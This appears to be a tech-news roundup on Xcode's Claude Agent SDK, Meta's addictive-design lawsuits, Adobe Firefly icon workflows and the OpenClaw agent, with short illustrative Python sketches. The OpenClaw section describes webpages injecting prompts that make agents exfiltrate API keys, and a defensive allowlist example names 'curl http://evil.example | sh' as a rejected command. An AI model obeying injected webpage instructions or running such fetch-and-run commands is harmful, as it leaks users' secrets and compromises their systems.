If you are building products or content in 2026, you are operating in a world where AI is embedded in developer tools, news cycles, social feeds, and design workflows. Apple’s support for the Claude Agent SDK inside Xcode, the rise of daily AI news formats, Meta’s incentives to maximize engagement, and Adobe Firefly’s design workflows all point to the same reality: speed and automation are increasing sharply, and so are the responsibility and attention risks that come with them. This article walks through each story and what it means for how you build and market in 2026.

Apple’s Xcode 26.3 Now Supports the Claude Agent SDK

Anthropic announced that Xcode 26.3 includes a native integration with the Claude Agent SDK, bringing the same autonomous capabilities that power Claude Code directly into Apple’s IDE. In earlier Xcode releases, Claude Sonnet 4 could help with single requests like writing code or generating documentation, but it could not manage longer, multi-step workflows inside a project. With the new SDK integration, Claude can now carry out long‑running, autonomous coding tasks, reason across an entire Apple project, and interact with previews to visually validate UI work.

One of the biggest changes is visual verification with Xcode Previews: Claude captures SwiftUI previews, evaluates whether the interface matches the design intent, and iterates without the developer having to manually refresh or point out issues. Because Claude can see the preview output, it can close the loop on its own implementation, making UI work closer to a delegated task than a simple autocomplete. Claude also gains project‑wide reasoning: it explores the full file structure and works out how SwiftUI, UIKit, SwiftData, and other components connect before it decides where to make changes.

The Claude Agent SDK also enables autonomous task execution, where a developer gives Claude a goal rather than line‑by‑line instructions, and the model breaks the work into steps, edits the right files, reads Apple’s documentation as needed, and continues until the task is complete or blocked. For developers who prefer working in terminals, Xcode 26.3 exposes these capabilities through the Model Context Protocol, letting Claude Code integrate with Xcode and capture visual previews without leaving the CLI. Xcode 26.3 is currently available as a release candidate to Apple Developer Program members and will roll out more broadly on the App Store once Apple finalizes the release.
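The goal-driven loop described above can be sketched in a few lines. This is a minimal illustration of the general pattern (plan, execute, stop when complete or blocked), not the Claude Agent SDK's API. Every name here (`run_agent`, `StepResult`, `AgentRun`, the `plan` and `execute` callables, and the `max_steps` limit) is hypothetical.

```python
from dataclasses import dataclass, field
from typing import Callable, List


@dataclass
class StepResult:
    blocked: bool   # True when the step cannot proceed without human input
    note: str = ""  # short description of what happened


@dataclass
class AgentRun:
    goal: str
    log: List[str] = field(default_factory=list)
    status: str = "pending"


def run_agent(
    goal: str,
    plan: Callable[[str], List[str]],
    execute: Callable[[str], StepResult],
    max_steps: int = 20,
) -> AgentRun:
    """Break a goal into steps and run them until complete or blocked."""
    run = AgentRun(goal=goal)
    steps = plan(goal)  # hypothetical planner: goal -> ordered list of steps
    for index, step in enumerate(steps):
        if index >= max_steps:
            # Safety limit so a runaway plan cannot execute indefinitely.
            run.status = "step_limit"
            return run
        result = execute(step)
        run.log.append(f"{step}: {result.note}")
        if result.blocked:
            # Stop and hand control back to the developer.
            run.status = "blocked"
            return run
    run.status = "complete"
    return run
```

In a real agent, `plan` and `execute` would be backed by a model and by tools such as file edits or documentation lookups. Here they are plain callables so the control flow stays visible and easy to test.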

For teams shipping on iPhone, iPad, Mac, Apple Watch, Vision Pro, or Apple TV, this integration turns Claude from a one‑off assistant into a true coding agent that can own chunks of implementation work and UI iteration. The direct link to Anthropic’s announcement provides implementation details and related content on how Claude is positioned as an ad‑free, trustworthy assistant rather than an ad‑driven product.

Meta Under Fire Over “Addictive” Social Media Design

The third link, hosted at The Times, sits within a broader news cycle around lawsuits alleging that platforms like Meta, TikTok, Snap, and YouTube are deliberately designed to be addictive and harmful to young users’ mental health. Coverage in other outlets highlights that Meta is facing trials where internal documents and executive emails are being scrutinized for evidence that engagement was prioritized over safety. Judges have ordered the release of thousands of pages of internal communication that reportedly show Meta knew about the risks of certain features but continued to deploy or consider re‑deploying them.

For example, reporting describes internal debates over beauty filters that altered faces to unrealistic ideals, with some executives aware of their impact on body image while others pushed to restore them after removal. There has also been concern over chatbots that generated romantic or sexual content when used by teens, with senior policy leaders questioning whether that is the kind of product experience the company wants to be known for. In parallel, the U.S. Surgeon General has warned that teens who spend more than three hours per day on social platforms face roughly double the risk of depression and anxiety symptoms, even calling for warning labels akin to those used on tobacco.

Meta and other platforms often argue in court that mental health outcomes cannot be attributed to a single factor and that the concept of “social media addiction” can oversimplify complex behavior. Yet public narratives increasingly focus on design patterns, such as infinite scroll, variable rewards, algorithmic recommendations, and push notifications, that encourage longer sessions and more frequent returns. For creators and marketers, this environment raises ethical questions: optimizing for engagement in a system already under legal and regulatory scrutiny may carry reputational and compliance risks.

The Times article fits within this context, exploring how Meta continues to evolve its products and to use AI for personalization and retention while regulators, courts, and researchers debate where the line lies between effective product design and manipulative, harmful experiences. It underscores the need for brands to think beyond raw engagement metrics and to consider well‑being, consent, and long‑term trust as part of their social media strategy.



Adobe Illustrator + Firefly: Faster, Cohesive Icon Systems

The final link is a detailed Softonic article explaining how Adobe Illustrator, combined with Adobe Firefly’s AI capabilities, helps designers create large icon systems faster while maintaining consistency across products and platforms. Icons, the article notes, are now core parts of design systems that must be recognizable, scalable, and coherent whether they appear on a phone, tablet, or desktop. Illustrator remains the environment where precise vector work happens, while Firefly accelerates experimentation and iteration in the early stages.

One of the main challenges in icon design is avoiding iteration fatigue (repeating the same styles without exploring enough creative options) while ensuring scalability, meaning new icons can be added later without breaking the visual language. Firefly’s vector generation models, accessible directly inside Illustrator via the “Generate Vectors” panel or through the Firefly web interface, let designers prompt for concepts and styles, then refine or redraw the best outputs as clean vectors. The workflow described includes setting up a square logo canvas, using a rectangle as a generation boundary, and selecting “Icon” as the content type while experimenting with styles, colors, and effects.

Once initial ideas are generated, designers return to Illustrator to redraw, refine proportions, standardize stroke widths, and enforce layout rules such as consistent sizes and internal margins. The article emphasizes practical tips like defining a standard icon size, avoiding eyeballing line weights, and checking legibility across different contexts. It also explains that when expanding an icon set over time, sticking to established line thickness, visual language (flat, comic, etc.), and grid structure is key to preserving coherence.
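One way to avoid eyeballing these rules is to write them down as a small spec and check each icon against it. The sketch below is an assumption-heavy illustration, not an Adobe tool or an Illustrator API. The `IconSpec` defaults (24 px canvas, 2 px stroke, 2 px margin) and the `Icon` fields are hypothetical values you would replace with measurements from your own design system.

```python
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class IconSpec:
    size: int = 24       # assumed square canvas size, in px
    stroke: float = 2.0  # assumed standard stroke width, in px
    margin: int = 2      # assumed minimum internal margin, in px


@dataclass(frozen=True)
class Icon:
    name: str
    width: int
    height: int
    stroke: float
    margin: int


def check_icon(icon: Icon, spec: IconSpec) -> List[str]:
    """Return a list of human-readable rule violations (empty if none)."""
    problems = []
    if (icon.width, icon.height) != (spec.size, spec.size):
        problems.append(
            f"{icon.name}: canvas is {icon.width}x{icon.height}, "
            f"expected {spec.size}x{spec.size}"
        )
    # Compare strokes with a small tolerance to avoid float noise.
    if abs(icon.stroke - spec.stroke) > 0.01:
        problems.append(
            f"{icon.name}: stroke is {icon.stroke}, expected {spec.stroke}"
        )
    if icon.margin < spec.margin:
        problems.append(
            f"{icon.name}: margin is {icon.margin}, minimum is {spec.margin}"
        )
    return problems
```

Running `check_icon` over every icon before a release gives a simple gate for the size, stroke, and margin rules. Legibility across contexts still needs a human review.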

Adobe is also using pricing incentives to make this workflow more accessible, offering 50% off Creative Cloud Pro for Students and Teachers for the first six months on eligible annual plans, valid for new subscriptions in the U.S. and Canada between January 15 and February 2, 2026. This promotion lowers the barrier for design students and educators who want to learn modern icon system workflows using professional tools from day one. For brands present across multiple platforms, combining Illustrator and Firefly promises faster iteration without sacrificing quality, making it easier to maintain strong, recognizable iconography at scale.

OpenClaw “Clawbots” Bring Autonomous Agents and New Risks

OpenClaw, originally launched as Clawdbot then briefly rebranded as Moltbot, has become one of the most talked‑about autonomous AI agents of early 2026. Created by Austrian developer Peter Steinberger, it runs locally or on a self‑hosted server and connects to large language models like Claude or ChatGPT, turning chat apps such as WhatsApp, Telegram, Discord, Slack, and even Twitch into command centers for a bot that can actually take actions for you. Instead of just answering questions, OpenClaw can clear inboxes, send emails, manage calendars, browse the web, create files, run terminal commands, and interact with real applications on your operating system.

OpenClaw’s appeal is its open‑source, local‑first design, which lets developers inspect and modify the code, extend it with new “skills,” and run it on hardware they fully control. This has driven rapid adoption, with tens of thousands of GitHub stars and forks, and an ecosystem where users share reusable workflows and even socialize their bots via a “Moltbook” layer where agents discuss tasks and strategies. OpenClaw markets itself as “the AI that actually does things,” and early case studies describe agents that proactively scan social media for opportunities, draft feature requests, and execute multi‑step workflows overnight without human supervision.

However, security researchers and infrastructure companies are sounding alarms about the risks of giving an agent deep system permissions while it also consumes untrusted content from the open web. Reports describe misconfigured OpenClaw instances exposed directly to the public internet, Moltbook databases left without access controls, and classic prompt‑injection scenarios where a malicious webpage can trick the agent into exfiltrating API keys or sensitive data. Because OpenClaw can send emails, run shell commands, and modify files, a single compromised instruction can turn into real‑world damage much faster than with a chat‑only model.
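A common mitigation for this class of risk is to gate every action the agent proposes, so that text pulled from a webpage cannot directly become a shell command. The sketch below shows a deny-by-default allowlist check. It is a generic illustration and not part of OpenClaw. The `ALLOWED_COMMANDS` set and the `is_command_allowed` function are hypothetical.

```python
import shlex
from typing import FrozenSet

# Hypothetical allowlist: only these executables may be run by the agent.
ALLOWED_COMMANDS: FrozenSet[str] = frozenset({"ls", "pwd", "git"})

# Characters that enable chaining, piping, redirection, or substitution.
SHELL_METACHARS = set(";|&`$><\n")


def is_command_allowed(
    command_line: str,
    allowed: FrozenSet[str] = ALLOWED_COMMANDS,
) -> bool:
    """Deny by default: permit only simple, allowlisted commands."""
    if any(ch in SHELL_METACHARS for ch in command_line):
        return False
    try:
        tokens = shlex.split(command_line)
    except ValueError:
        # Unbalanced quotes or similar: treat as untrusted.
        return False
    return bool(tokens) and tokens[0] in allowed
```

For example, `is_command_allowed("ls -la")` passes, while `is_command_allowed("curl http://evil.example | sh")` is rejected. The check only inspects the executable name and a few metacharacters. It does not constrain arguments, so a production setup would also need sandboxing, scoped credentials, and human approval for sensitive actions.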

Coverage from outlets like CNET, PCMag, and CNBC frames OpenClaw as a symbol of where AI agents are heading: from passive assistants to fully autonomous operators embedded in everyday tools, with all the productivity upside and security downside that implies. Commentators in AI news shows have even described the “clawbots” phenomenon as “the most incredible sci‑fi adjacent takeoff” they have seen lately, noting that communities of agents and users are self‑organizing on Reddit‑like sites to trade workflows and discuss how their bots are interacting with human life and work.